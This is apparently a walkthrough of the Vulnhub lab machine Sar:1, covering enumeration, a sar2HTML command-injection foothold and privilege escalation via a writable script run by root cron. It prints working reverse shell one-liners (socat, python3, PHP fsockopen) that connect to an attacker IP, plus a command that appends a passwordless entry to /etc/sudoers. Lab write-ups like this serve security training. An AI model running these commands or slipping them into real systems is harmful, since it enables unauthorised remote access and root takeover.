Sar1

Sar:1 Vulnhub Walkthrough

Enumeration

Nmap

nmap -sC -sV -oA nmap/sar1 192.168.43.166
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-13 22:37 EDT
Nmap scan report for 192.168.1.112
Host is up (0.0033s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
MAC Address: 00:0C:29:46:0D:BC (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.39 seconds

1 port open only ! Great!

Dirb

dirb http://192.168.43.166
-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Wed May 13 22:38:52 2020
URL_BASE: http://192.168.1.112/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.1.112/ ----
+ http://192.168.1.112/index.html (CODE:200|SIZE:10918)                                                                                                            
+ http://192.168.1.112/phpinfo.php (CODE:200|SIZE:95475)                                                                                                           
+ http://192.168.1.112/robots.txt (CODE:200|SIZE:9)                                                                                                                
+ http://192.168.1.112/server-status (CODE:403|SIZE:278)                                                                                                           
                                                                                                                                                                   
-----------------
END_TIME: Wed May 13 22:38:57 2020
DOWNLOADED: 4612 - FOUND: 4

Reverse Shell

Let's navigate to robots.txt

replace robots.txt to sar2HTML at the URL.

After Googling for awhile, I found sar2HTML exploit at exploit-db.

This means that we can put semicolon after plot then we can write command at the back of it to access the machine, so guess this is here where we can supply a reverse shell code and get access to the machine.

nc -nv <IP> <Port> doesn't work so I use socat to get a reverse shell from it, we also can use python3 to get a reverse shell from it 

Socat
Victim's Machine - socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444
Attacking Machine - socat file:`tty`,raw,echo=0 tcp-listen:4444

Python3
Victim Machine - python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Attacking Machine - nc -nlvp <port>

We got a shell!

Navigate to the love user directory then we will get the flag for user

Privilege Escalation

After trying some method and I found something at crontab

It seems like there is a file called finally.sh that will run as superuserdo every 5 minutes

Lets locate the file

After that we cat finally.sh

We can see that inside of the finally.sh will run another file which called write.sh that also have it inside this folder.

We can see that finally.sh is not writable but normal user, but write.sh can

We can add some code inside

Method 1

echo "php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'" >> write.sh

Then, go to the attacking machine and set up a listener by typing

nc -lvp 4444

Wait for 5 minutes and you will get a shell and it is root !

Method 2

echo "www-data NOPASSWD: /bin/bash" >> /etc/sudoers

Wait for 5 minutes then type

sudo -l and you will see can execute /bin/bash without password we created earlier

sudo /bin/bash to get root !

Navigate to /root to get the flag!

Congratulation!

PreviousDC9NextToppo 1

Last updated